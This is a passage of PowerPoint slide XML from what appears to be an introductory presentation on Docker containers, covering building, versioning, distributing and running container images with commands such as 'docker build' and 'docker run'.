            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8010368" y="2287763"/>
            <a:ext cx="620829" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>User C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Straight Connector 57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="347056" y="2882094"/>
            <a:ext cx="0" cy="1527286"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0183B7"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="415860" y="2620180"/>
            <a:ext cx="1925408" cy="119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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Tools for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>building</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t> your application into a container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Often automated.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674493" y="4443536"/>
            <a:ext cx="1349587" cy="28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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Build tooling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5523843" y="2860743"/>
            <a:ext cx="3322066" cy="154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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container image is pulled from repository and ’run’. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>The container system on the destination OS will automate the necessary kernel features to set up the isolated contents of the container image and run the binaries / code inside.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>A manifest (embedded with the built container image) tells the system what to run and what ports (if any) are needed to access the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Experience is consistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3595762" y="2807612"/>
            <a:ext cx="1925408" cy="154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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Versioned container image given a name, uploaded to a repository. Allows other systems to consume the container, run it immediately on their systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Systems could be same company (Private repo) or anyone online (Public repo)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69" name="Straight Connector 68"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2341267" y="2882094"/>
            <a:ext cx="0" cy="1527286"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0183B7"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70" name="Straight Connector 69"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3516976" y="2860743"/>
            <a:ext cx="0" cy="1527286"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0183B7"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Straight Connector 70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5475717" y="2882094"/>
            <a:ext cx="0" cy="1527286"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0183B7"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72" name="Straight Connector 71"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8924693" y="2916257"/>
            <a:ext cx="0" cy="1527286"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0183B7"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2461371" y="2648084"/>
            <a:ext cx="985165" cy="99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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Build output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>A container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>image.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2452543" y="4455200"/>
            <a:ext cx="945721" cy="28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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Standard format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3942409" y="4446296"/>
            <a:ext cx="1251146" cy="28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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Distribution and Versioning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5734622" y="4411477"/>
            <a:ext cx="1276921" cy="28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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>App isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6817051" y="4423625"/>
            <a:ext cx="1251146" cy="28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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Consistent experience</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7927088" y="4411477"/>
            <a:ext cx="700935" cy="280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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Speed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3898494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Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606543" y="3348435"/>
            <a:ext cx="8071789" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>We will be talking about Docker’s flavor of container + toolchain. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Most popular, most online documentation, community.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="348353" y="1576450"/>
            <a:ext cx="8451874" cy="1870598"/>
            <a:chOff x="91543" y="1785606"/>
            <a:chExt cx="8573463" cy="2096548"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="Straight Connector 57"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="199459" y="2095459"/>
              <a:ext cx="0" cy="952541"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0183B7"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5891210" y="1785606"/>
              <a:ext cx="1982497" cy="1360945"/>
              <a:chOff x="5891210" y="1499856"/>
              <a:chExt cx="1982497" cy="1360945"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77" name="Title 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6041557" y="1499856"/>
                <a:ext cx="1568605" cy="517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defTabSz="513160"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="282828"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>Running</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5891210" y="2343370"/>
                <a:ext cx="1982497" cy="517431"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="685800"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>$ </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>docker</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t> run</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1743800" y="2095458"/>
              <a:ext cx="0" cy="952541"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0183B7"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3486875" y="2095459"/>
              <a:ext cx="0" cy="952541"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0183B7"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Straight Connector 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8665006" y="2095459"/>
              <a:ext cx="0" cy="952541"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0183B7"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="Group 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="91543" y="1785606"/>
              <a:ext cx="1703614" cy="2073806"/>
              <a:chOff x="91543" y="1499856"/>
              <a:chExt cx="1703614" cy="2073806"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Title 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="91543" y="2328780"/>
                <a:ext cx="1703614" cy="1244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defTabSz="513160"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>$ </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>docker</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t> build .</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="353447" y="1499856"/>
                <a:ext cx="967833" cy="793392"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="685800"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="282828"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>Build </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr defTabSz="685800"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="282828"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>tooling</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1848846" y="1785606"/>
              <a:ext cx="1748822" cy="1665879"/>
              <a:chOff x="1823486" y="1499856"/>
              <a:chExt cx="1748822" cy="1665879"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="74" name="Title 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1823486" y="2324147"/>
                <a:ext cx="1748822" cy="84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defTabSz="513160"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>$ </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>docker</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t> images</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1943947" y="1499856"/>
